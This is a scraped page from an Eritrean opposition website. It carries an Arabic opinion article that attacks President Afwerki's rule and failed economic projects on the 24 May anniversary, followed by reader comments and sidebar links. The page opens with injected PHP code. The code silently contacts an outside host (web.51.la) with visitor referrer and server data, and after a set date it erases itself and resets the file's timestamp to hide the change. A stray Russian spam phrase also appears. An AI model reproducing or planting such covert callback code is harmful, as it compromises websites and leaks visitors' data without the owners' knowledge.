check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } 24 مايو على الأبواب, فبأى جديد آت
кремлевская диета

24 مايو على الأبواب, فبأى جديد آت

User Rating: / 3
PoorBest 

 

 

 

 

 

24 مايو على الأبواب, فبأى جديد آت؟

بقلم: محمد عيسى

بأستثناء السنوات الأولى من التحرير التى اتسمت بالحماس والرغبة الجامحه فى تحقيق حلم الاجيال فى بناء ارتريا التى تتجسد فيها مبادىء الحرية والديمقراطيه والعدالة والمساواه, والتى سالت من اجلها الدماء, واستشهد فى سبيلها عشرات الآلاف من الرجال والنساء, ارتريا الوطن الآمن المستقر المزدهر, فقد اصبحت اطلالة 24 مايو فى كل عام مقرونة بنكسات ومصائب وكوارث, أولها الحرب مع اثيوبيا وتداعياتها المدمره, واحدثها حركة 21 يناير وحملات الاعتقالات التى اعقبتها. لم تعد ذكرى 24 مايو يوم عيد وطنى تبتهج له الأمه وتستقبله بامل متجدد وحماس لمعانقة  احلامها واحلام الشهداء فى ارتريا ما بعد التحرير. وانما ويا للحسره,  قد  تحول هذا اليوم, الى يوم للرقص والغناء والاستعراض, يختتم بخطاب مسهب لأفورقى عن ( الأمن الغذائى )  ومهاجمة الولايات المتحده وبقية الدول الغربيه, واتهامهم بالسعى لمحاصرة ارتريا واركاعها, ووعود جوفاء بعمل كذا وكذا, تكذب نفسها بنفسها فى اليوم التالى. الى جانب ما يسمى باللقاء مع ( وسائل الاعلام العالميه) والساعات الطويله الممله التى يقضيها فى التفلسف والتنظير و ( مرمطة) قادة افريقيا ( الغلابه) واتهامهم بالعمالة والفساد وسوء الاداره, متجاهلا دون حياء, ان هؤلاء الغلابه وصلوا الى كرسى الحكم عبر انتخابات جرت امام مراى ومسمع العالم, وانهم يحتكمون الى دساتير ويخضعون لمراقبة برلمانات منتخبه.    ان ( الغلابه) الذين يزدريهم أفورقى   لايغيبون خصومهم وهم احياء, وانما يقدمونهم لمحاكم تكفل لهم حق الدفاع عن انفسهم والرد على التهم الموجهة اليهم, وان ادينو فانهم على الأقل يعرفون نوع العقوبه وعدد سنواتها, الى جانب حقهم فى الأستئناف ضد الحكم فأين هو من  ذلك؟ هل حدث ان قدم احدا من خصومه  _ وهم كثر _  الى المحاكم  ليعرف  نوع جريمته والعقوبة المفروضة عليه؟ ابدا انهم جميعا ولسنوات طويله تجاوزت العقد ويزيد فى (اللامكان) ولا يعرف أحدا  ان كانو احياء أو اموات.

أما مشاريع الأمن الغذائى التى يتبجح بها أفورقى, ويلوح بها كسلاح فى مواجهة أمريكا والغرب وكل الذين يتهمهم بالسعى لزعزعة نظامه, فهى اشبه ما تكون بمخدر انتهت صلاحيته وبطل مفعوله. ورغم انه يصفها بالمشاريع الأستراتيجيه, فأنها لم تقدم حتى الآن  شيئا يستفيد منه المواطن الأرترى منذ البدء فيها قبل تسع سنوات. فمصنع (باناتوما) لتعليب الصلصه والموز فى ( ألبو) الذى قيل انه سيغطى الأحتياجات المحليه ويصدر الفائض منه الى الأسواق الخارجيه, لا يعمل الا لموسم واحد فقط ويعلم الله كم هى انتاجيته. ومصنع السكر فى ( عد-عمر) هل سمعتم عن مزارع لقصب السكر تعتمد على المياه الجوفيه, وهل يعقل ان تتنافس ارتريا فى انتاج هذه السلعه مع الجارين اثيوبيا والسودان اللذان ينتجان منها ملايين الأطنان اعتمادا على مياه نهر النيل التى تفيض ولا تنضب؟ ومشروع ( على قدر) لزراعة القطن لماذا تحول الى اطلال بعد ان كان يتميز بانتاجه الجيد والغزير حتى فى عهد الاستعمار. وقس على ذلك كل المشاريع التى يفاخر بها أفورقى, بما فيها مطار ( مصوع الدولى) الذى لم يستقبل منذ انتهاء العمل فيه, اية طائره للخطوط الاجنبيه العامله من والى ارتريا, لعدم مطابقته للمواصفات الدوليه. كل هذه المشاريع لم تنجح لأنها غير مؤسسة على دراسات جدوى معتمده , ولا يؤخذ فيها آراء المختصين فى الشئون الاقتصاديه, زراعية كانت أم صناعيه أم تجاريه, حتى المعدات الثقيله التى تستورد بملايين الدولارات من الذى أوصى بالحاجة اليها؟ لا أحد انها اوامر أفورقى, الرئيس والقائد والمهندس الزراعى_ الميكانيكى _ المعمارى. الرئيس العالم بكل شيىء . أما بالنسبة لسد ( قرست)  و ( فانكو طمؤ) و( فانكو راوى)  التى شيدت  بكد وكدح شباب الخدمة الألزاميه , فأن عائدات المزارع التى ترويها مياه هذه السدود, لايستفيد منها الا نفر من الجنرالات وبعض من يأتمرون بأوامرهم, اما اولئك الشباب الذين سقوا تلك المزارع بعرقهم وجهدهم قبل ان تتدفق اليها المياه, باقون على حالهم فلا اضافة فى الرواتب ولا تحسن فى الملبس والمأكل, بل واقع مرير يكذب ويفضح ادعاءات أفورقى ووعوده الجوفاء.

 فاذا كان يوم 24 مايو قد تحول, الى يوم يزيدنا فيه افورقى, الما وحزنا وحسره, فأن التأريخ قد اثبت ان الطغاة عندما يصلون الى نقطة اللاعوده, يتصرفون بجنون وتهور ليقتربوا اكثر فأكثر من نهاياتهم المأساويه. وهذا هو عين مايفعله أفورقى. لقد فات الآوان ولم يعد هناك مجال للتراجع أو الترقيع.  يجب ان ( يزاح) افورقي. وهذه كانت رسالة حركة 21 يناير التى لم يكتب لها النجاح. واذا كان قد افلت هذه المره لسبب أو آخر, فأنه لن  يفلت من الزوال الذى ينتظره فى كل منعطف ومنحنى  مهما كانت الاحتياطات الامنيه ومستوى الحراسات التى يحيط بها نفسه, وهذا هو الجديد الذى يجب ان يأتى ليكون يوم 24 مايو يوم عيد تبتهج له الامه وترسم فيه خطوط مستقبلها.                                                                                                                                                                                                          

 


Comments 

  1. #2 abdulfatah wad al khalifa
    2013-05-2614:34:37 تسلم ود عيسى (مقال من بيت الكلاوى) واصل ولا تحرمنا من مساهماتك القيمة
  2. #1 wad ad
    2013-05-1905:48:53 Very good article

Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player

عمود الكتاب العربي

Arkokabay.com
Arkokabay.com
OMAR JABIR الأستاذ عمر جابر
OMAR JABIR الأستاذ عمر جابر
Zein Shokayالأستاذ زين شوكاي
Zein Shokayالأستاذ زين شوكاي
سعادة السفير حمد كلُ
سعادة السفير حمد كلُ
الأستاذ صلاح أبوراي
الأستاذ صلاح أبوراي
 الأستاذة حنان
الأستاذة حنان
الأستاذ موسى ضرار
الأستاذ موسى ضرار
الأستاذ أبو الرشيد
الأستاذ أبو الرشيد
الأستاذ عبدالفتاح ود الخليفة
الأستاذ عبدالفتاح ود الخليفة
الأستاذ ياسين محمد عبدالله
الأستاذ ياسين محمد عبدالله
الأستاذ محمد نور - بركان
الأستاذ محمد نور - بركان
الأستاذ جمال همد
الأستاذ جمال همد
الأستاذ فكاك ناير
الأستاذ فكاك ناير
الأستاذ أحمد صلاح الدين
الأستاذ أحمد صلاح الدين
Amal Ali الأستاذة أمال علي
Amal Ali الأستاذة أمال علي
Mohamed - Wahran Eritreaمحمد - وهران ارتريا
Mohamed - Wahran Eritreaمحمد - وهران ارتريا
الأستاذ حسن سلمان
الأستاذ حسن سلمان
الأستاذة منى محمد صالح
الأستاذة منى محمد صالح
الاستاذة نوره فارس
الاستاذة نوره فارس